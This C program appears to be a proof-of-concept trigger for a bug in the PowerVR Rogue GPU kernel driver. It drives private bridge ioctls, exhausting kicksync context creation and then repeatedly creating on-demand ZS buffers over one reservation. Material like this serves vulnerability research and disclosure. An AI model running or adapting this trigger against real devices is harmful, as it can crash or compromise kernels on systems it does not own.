#include <err.h>
#include <unistd.h>
#include <assert.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/signalfd.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int gpu_fd;

#define DRM_IOCTL_PVR_SRVKM_INIT 0x40046445
#define PVR_SRVKM_SERVICES_INIT  1
#define PVR_SRVKM_SYNC_INIT 2
struct drm_pvr_srvkm_init_data {
	uint32_t init_module;
};
static void srvkm_init(void) {
  struct drm_pvr_srvkm_init_data data = { .init_module = PVR_SRVKM_SERVICES_INIT };
  SYSCHK(ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_INIT, &data));
}


struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD  0xc0206440

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

typedef void *IMG_HANDLE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint8_t IMG_UINT8;
typedef uint32_t IMG_UINT32;
typedef uint64_t IMG_UINT64;
typedef IMG_UINT64 PVRSRV_MEMALLOCFLAGS_T;


#define PVRSRV_BRIDGE_MM 6

#define PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2 47
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2_TAG
{
	IMG_DEV_VIRTADDR sAddress;
	IMG_DEVMEM_SIZE_T uiLength;
	IMG_HANDLE hDevmemServerHeap;
	PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2_TAG
{
	IMG_HANDLE hReservation;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2;

#define PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE 17
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE_TAG
{
	uint64_t sHeapBaseAddr;
	uint64_t uiHeapLength;
	IMG_HANDLE hDevmemCtx;
	uint32_t ui32Log2DataPageSize;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE_TAG
{
	IMG_HANDLE hDevmemHeapPtr;
	int eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE;

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE 15
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE_TAG
{
	int bbKernelMemoryCtx;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE_TAG
{
	IMG_HANDLE hDevMemServerContext;
	IMG_HANDLE hPrivData;
	int eError;
	unsigned int ui32CPUCacheLineSize;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE;

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR 10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	uint64_t uiChunkSize;
	uint64_t uiSize;
	uint32_t *pui32MappingTable;
	const char *puiAnnotation;
	uint32_t ui32AnnotationLength;
	uint32_t ui32Log2PageSize;
	uint32_t ui32NumPhysChunks;
	uint32_t ui32NumVirtChunks;
	uint32_t ui32PDumpFlags;
	uint32_t ui32PID;
	uint64_t uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	IMG_HANDLE hPMRPtr;
	int eError;
  PVRSRV_MEMALLOCFLAGS_T uiOutFlags;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;

#define PVRSRV_BRIDGE_RGXTA3D 130UL
#define PVRSRV_BRIDGE_RGXTA3D_RGXCREATEZSBUFFER2 14
#define PVRSRV_MEMALLOCFLAG_NO_OSPAGES_ON_ALLOC			(1ULL<<15)
typedef struct PVRSRV_BRIDGE_IN_RGXCREATEZSBUFFER2_TAG
{
	IMG_HANDLE hPMR;
	IMG_HANDLE hReservation;
	PVRSRV_MEMALLOCFLAGS_T uiMapFlags;
} __packed PVRSRV_BRIDGE_IN_RGXCREATEZSBUFFER2;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATEZSBUFFER2_TAG
{
	IMG_HANDLE hsZSBufferKM;
	int eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATEZSBUFFER2;

#define PVRSRV_BRIDGE_RGXKICKSYNC 136UL
#define PVRSRV_BRIDGE_RGXKICKSYNC_RGXCREATEKICKSYNCCONTEXT 0
typedef struct PVRSRV_BRIDGE_IN_RGXCREATEKICKSYNCCONTEXT_TAG
{
	IMG_HANDLE hPrivData;
	IMG_UINT32 ui32ContextFlags;
	IMG_UINT32 ui32PackedCCBSizeU88;
} __packed PVRSRV_BRIDGE_IN_RGXCREATEKICKSYNCCONTEXT;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATEKICKSYNCCONTEXT_TAG
{
	IMG_HANDLE hKickSyncContext;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATEKICKSYNCCONTEXT;


static IMG_HANDLE create_device_memory_context(IMG_HANDLE *priv_data_out) {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE in = { .bbKernelMemoryCtx = false };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE);
  printf("cache line: %u bytes\n", out.ui32CPUCacheLineSize);
  *priv_data_out = out.hPrivData;
  return out.hDevMemServerContext;
}

static IMG_HANDLE create_heap(IMG_HANDLE mem_ctx, unsigned int page_size_log2, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE in = {
    .sHeapBaseAddr = base,
    .uiHeapLength = len,
    .hDevmemCtx = mem_ctx,
    .ui32Log2DataPageSize = page_size_log2,
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE);
  return out.hDevmemHeapPtr;
}

static IMG_HANDLE create_reservation(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2 in = {
    .sAddress = base, .uiLength = len, .hDevmemServerHeap = heap
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2 out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2);
  return out.hReservation;
}

// non-sparse, locked
static IMG_HANDLE alloc_pmr(uint64_t alloc_size) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cpu_cache_mode = 2; // cache-coherent with snoop if supported
  uint64_t gpu_cache_mode = 2; // cache-coherent with snoop if supported
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = alloc_size,
    .uiSize = alloc_size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 1,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | (gpu_cache_mode << 8) | (cpu_cache_mode << 11) |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) | (/*cache clean*/1<<19) |
               (/*zero backing*/0<<20) | (/*zero on alloc*/0ULL<<31) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}

static bool try_create_zs_buffer(IMG_HANDLE pmr, IMG_HANDLE resv, bool on_demand) {
  PVRSRV_BRIDGE_IN_RGXCREATEZSBUFFER2 in = {
    .hPMR = pmr,
    .hReservation = resv,
    .uiMapFlags = on_demand ? PVRSRV_MEMALLOCFLAG_NO_OSPAGES_ON_ALLOC : 0
  };
  PVRSRV_BRIDGE_OUT_RGXCREATEZSBUFFER2 out;
  do_driver_cmd_noerror(PVRSRV_BRIDGE_RGXTA3D, PVRSRV_BRIDGE_RGXTA3D_RGXCREATEZSBUFFER2);
  if (out.eError == 0)
    return true;
  printf("PVRSRV_BRIDGE_RGXTA3D_RGXCREATEZSBUFFER2 error %u\n", out.eError);
  return false;
}

static bool try_create_kicksync_context(IMG_HANDLE priv_data, uint8_t size_log2) {
  assert(size_log2 >= 13 && size_log2 <= 18);
  uint8_t alloc_size = size_log2;
  uint8_t max_alloc_size = size_log2;
  PVRSRV_BRIDGE_IN_RGXCREATEKICKSYNCCONTEXT in = {
    .hPrivData = priv_data,
    .ui32ContextFlags = 0,
    .ui32PackedCCBSizeU88 = (max_alloc_size << 8) | alloc_size
  };
  PVRSRV_BRIDGE_OUT_RGXCREATEKICKSYNCCONTEXT out;
  do_driver_cmd_noerror(PVRSRV_BRIDGE_RGXKICKSYNC, PVRSRV_BRIDGE_RGXKICKSYNC_RGXCREATEKICKSYNCCONTEXT);
  if (out.eError == 0)
    return true;
  printf("PVRSRV_BRIDGE_RGXKICKSYNC_RGXCREATEKICKSYNCCONTEXT error %u\n", out.eError);
  return false;
}

#define RGX_GENERAL_HEAP_BASE 0x8000000000UL
#define RGX_GENERAL_HEAP_SIZE 0x2000000000UL

int main(void) {
  sync();
  setbuf(stdout, NULL);

  gpu_fd = SYSCHK(open("/dev/dri/by-path/platform-pvr-rogue.1.auto-card", O_RDWR));
  srvkm_init();
  IMG_HANDLE priv_data;
  IMG_HANDLE mem_ctx = create_device_memory_context(&priv_data);
  IMG_HANDLE heap = create_heap(mem_ctx, 12, RGX_GENERAL_HEAP_BASE, RGX_GENERAL_HEAP_SIZE);
  IMG_HANDLE one_page_pmr = alloc_pmr(0x1000);
  IMG_HANDLE resv = create_reservation(heap, RGX_GENERAL_HEAP_BASE, 0x1000);
  for (unsigned long i = 0, size_log2 = 18; size_log2 >= 13; i++) {
    printf("\riteration %lu, size_log2=%lu...", i, size_log2);
    if (!try_create_kicksync_context(priv_data, size_log2))
      size_log2--;
  }
  for (unsigned long i = 0, failures=0; failures < 2; i++) {
    printf("\rZS buffer iteration %lu...", i);
    if (!try_create_zs_buffer(one_page_pmr, resv, true))
      failures++;
  }
  printf("exiting\n");
}
